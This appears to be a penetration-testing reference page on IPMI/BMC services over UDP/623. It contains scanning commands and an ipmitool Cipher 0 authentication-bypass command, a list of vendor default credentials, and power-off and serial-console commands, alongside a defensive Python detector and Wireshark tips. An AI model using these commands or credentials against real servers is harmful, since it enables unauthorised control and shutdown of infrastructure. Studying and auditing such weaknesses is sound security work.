Notes



Alternative Ports
623 UDP (IPMI RMCP)

Service Description
IPMI (Intelligent Platform Management Interface) is used for remote server management, hardware monitoring, and out-of-band administration. It is typically implemented by the BMC (Baseboard Management Controller). Traffic is carried over UDP/623 for RMCP and IPMI-over-LAN commands.

Warning

Some devices allow authentication bypass using Cipher 0 (no authentication). This can lead to full user enumeration and privilege abuse.


Attacks


Authentication Bypass via Cipher 0
Allows access without valid credentials by using null authentication (Auth Type 0). Supported by many older IPMI implementations.

Default or Weak Credentials
Many vendors ship with hardcoded or weak default passwords. Attackers can gain full access if unchanged.


Tools & Exploits


Enumeration


nmap
Scan for UDP/623 IPMI endpoints.

nmap -n -sU -p 623 <target>

Metasploit
Check for Cipher 0 and gather version info.

use auxiliary/scanner/ipmi/ipmi_cipher_zero
use auxiliary/scanner/ipmi/ipmi_version

ipmitool
Standard client for querying/managing IPMI endpoints.

# Cipher 0 null auth attack
ipmitool -I lanplus -C 0 -H <target> -U <username> -P <password> user list

Known Default Credentials (by Vendor)

Supermicro: ADMIN / ADMIN
Dell iDRAC: root / calvin
HP iLO: Administrator / <8-char default from label>
Cisco UCS: admin / admin
Generic: root / changeme

Exploitation or Post-Enum


Enumerate Users & Capabilities

ipmitool -I lanplus -H <target> -U <user> -P <pass> user list
ipmitool -I lanplus -H <target> -U <user> -P <pass> lan print

Power Controls / Remote Admin

ipmitool -I lanplus -H <target> -U <user> -P <pass> power status
ipmitool -I lanplus -H <target> -U <user> -P <pass> power off
ipmitool -I lanplus -H <target> -U <user> -P <pass> sol activate

Wireshark Analysis Tips


Filters

udp.port == 623

What to look for:

  • RMCP traffic structure
  • Cipher suite negotiation (look for Auth Type: None)
  • Leaked BMC metadata (firmware version, MAC, device type)
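The cipher-suite check above, as an added example that is not part of the original page: a Python parser for raw UDP/623 payloads that flags an IPMI 1.5 session header with Authentication Type NONE and an RMCP+ Open Session Request proposing authentication algorithm 0 (RAKP-none, the cipher suite 0 pattern). The sample datagrams are constructed for the example, not captured traffic.

```python
import struct

# Constants from the RMCP / IPMI 2.0 wire format
RMCP_VERSION, RMCP_CLASS_IPMI = 0x06, 0x07
AUTH_TYPE_NAMES = {0: "NONE", 1: "MD2", 2: "MD5", 4: "PASSWORD", 5: "OEM", 6: "RMCP+"}
RAKP_AUTH_NAMES = {0: "RAKP-none", 1: "RAKP-HMAC-SHA1", 2: "RAKP-HMAC-MD5", 3: "RAKP-HMAC-SHA256"}
PAYLOAD_OPEN_SESSION_REQUEST = 0x10


def parse_ipmi_datagram(data: bytes) -> dict:
    """Summarise one UDP/623 payload; returns {} when it is not RMCP class IPMI."""
    if len(data) < 5 or data[0] != RMCP_VERSION or data[3] != RMCP_CLASS_IPMI:
        return {}
    auth_type = data[4]  # first byte of the IPMI session header
    info = {"auth_type": AUTH_TYPE_NAMES.get(auth_type, "unknown"), "no_auth": auth_type == 0}
    if auth_type == 6 and len(data) >= 16:
        # RMCP+ header: payload type (low 6 bits), session id, sequence, payload length
        info["payload_type"] = data[5] & 0x3F
        (payload_len,) = struct.unpack_from("<H", data, 14)
        payload = data[16:16 + payload_len]
        if info["payload_type"] == PAYLOAD_OPEN_SESSION_REQUEST and len(payload) >= 32:
            # Algorithm bytes sit at payload offsets 12 (auth), 20 (integrity), 28 (confidentiality)
            auth_alg, integ_alg, conf_alg = payload[12] & 0x3F, payload[20] & 0x3F, payload[28] & 0x3F
            info.update(rakp_auth=RAKP_AUTH_NAMES.get(auth_alg, "unknown"),
                        integrity_alg=integ_alg, confidentiality_alg=conf_alg)
            info["no_auth"] = auth_alg == 0  # cipher suite 0 proposes RAKP-none
    return info


def find_unauthenticated(datagrams):
    """Indices of datagrams that use or negotiate an IPMI session with no authentication."""
    return [i for i, d in enumerate(datagrams) if parse_ipmi_datagram(d).get("no_auth")]


def open_session_request(auth_alg, integ_alg, conf_alg) -> bytes:
    """Build a constructed RMCP+ Open Session Request proposing the given algorithms (sample data)."""
    payload = (b"\x00\x04\x00\x00" + b"\xa4\xa3\xa2\xa0"  # tag, admin privilege, console session id
               + bytes([0x00, 0, 0, 8, auth_alg, 0, 0, 0])
               + bytes([0x01, 0, 0, 8, integ_alg, 0, 0, 0])
               + bytes([0x02, 0, 0, 8, conf_alg, 0, 0, 0]))
    header = b"\x06\x00\xff\x07" + b"\x06\x10" + b"\x00" * 8 + struct.pack("<H", len(payload))
    return header + payload


# Constructed sample datagrams, not captured traffic
SAMPLES = [
    b"\x06\x00\xff\x07" + b"\x00" + b"\x00" * 8 + b"\x09" + b"\x20\x18\xc8\x81\x00\x38\x0e\x04\x35",  # IPMI 1.5, auth NONE
    open_session_request(0, 0, 0),  # cipher suite 0
    open_session_request(1, 1, 1),  # cipher suite 3 (HMAC-SHA1 / HMAC-SHA1-96 / AES-CBC-128)
    b"\x00\x01\x02\x03",            # not RMCP at all
]

if __name__ == "__main__":
    for i in find_unauthenticated(SAMPLES):
        print(f"datagram {i}: unauthenticated IPMI session -> {parse_ipmi_datagram(SAMPLES[i])}")
```

Feeding the UDP payloads of a udp.port == 623 capture through find_unauthenticated gives the same result the Wireshark filter surfaces by eye; a BMC that should be hardened must never answer the cipher suite 0 request with an Open Session Response.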

BMC Fingerprinting


  • Scan nearby ports (80, 443, 6230, 8443) for web admin interfaces
  • Inspect MAC OUI to identify hardware vendor
  • Banner grabbing / HTTP responses can reveal model/firmware
  • SNMP or web UI leaks may also expose firmware and vendor info
